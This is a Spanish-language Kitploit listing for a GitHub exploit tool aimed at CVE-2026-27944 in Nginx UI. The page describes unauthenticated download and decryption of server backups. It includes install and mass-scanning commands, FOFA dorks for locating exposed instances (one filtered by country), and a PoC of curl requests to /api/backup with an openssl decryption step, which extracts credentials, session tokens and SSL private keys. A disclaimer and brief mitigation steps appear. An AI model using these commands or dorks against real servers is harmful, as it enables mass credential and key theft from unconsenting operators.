Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Cve-2026-27944-Tools-Exploit — Suka suka lah | Kitploit
Herramientas/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
ReconocimientoHerramientas de Cifrado/DescifradoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de Información
GitHub

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
bimabalance/cve-2026-27944-tools-exploit

Cve-2026-27944-Tools-Exploit

Suka suka lah

Ver Repositorio
1hace 1 mesAún no revisado
Compartir

🚀 CVE-2026-27944: Exploit de Backup sin Autenticación en Nginx UI

📌 Descripción

27944.py es una herramienta de explotación para CVE-2026-27944 que permite a un atacante descargar y descifrar copias de seguridad de Nginx UI sin autenticación.

Esta vulnerabilidad está presente en Nginx UI versión < 2.3.2 y permite el acceso a:

· Credenciales de usuario y tokens de sesión · Claves privadas SSL · Configuración de Nginx · Archivos de base de datos

🔧 Características

· ✅ Escaneo masivo desde archivo de objetivos · ✅ Explotación de un solo objetivo · ✅ Descarga automática de copia de seguridad · ✅ Descifrado automático AES-256-CBC · ✅ Extracción automática de credenciales de la copia de seguridad

🛠️ Instalación

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 Cómo Usar

  1. Escaneo Masivo
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. Explotar un Solo Objetivo
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. Explotación Completa
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 Formato de Objetivos

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 Dork FOFA

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 Resultados de Salida

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ Aviso Legal

Esta herramienta se crea con fines educativos y de pruebas de seguridad ética. El autor no se hace responsable por el mal uso de esta herramienta. Úsela únicamente en sistemas que posea o para los que tenga autorización por escrito para realizar pruebas.

📝 Explicación Técnica

CVE-2026-27944 es una vulnerabilidad crítica en Nginx UI que permite a un atacante acceder al endpoint /api/backup sin autenticación. La copia de seguridad contiene datos sensibles cifrados con AES-256, pero la clave y el IV se envían a través del encabezado X-Backup-Security en formato Base64.

Puntaje CVSS: 9.8 (Crítico)

Versiones Afectadas: Nginx UI < 2.3.2

Mitigación:

  1. Actualizar a Nginx UI v2.3.3
  2. Bloquear el acceso a /api/backup
  3. Rotar todas las credenciales

💀 PoC

root@kitploit:~
# Verificar vulnerabilidad
curl -I http://target:9000/api/backup

# Descargar copia de seguridad
curl -s http://target:9000/api/backup -o backup.bin

# Descifrar copia de seguridad (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
Descargar herramienta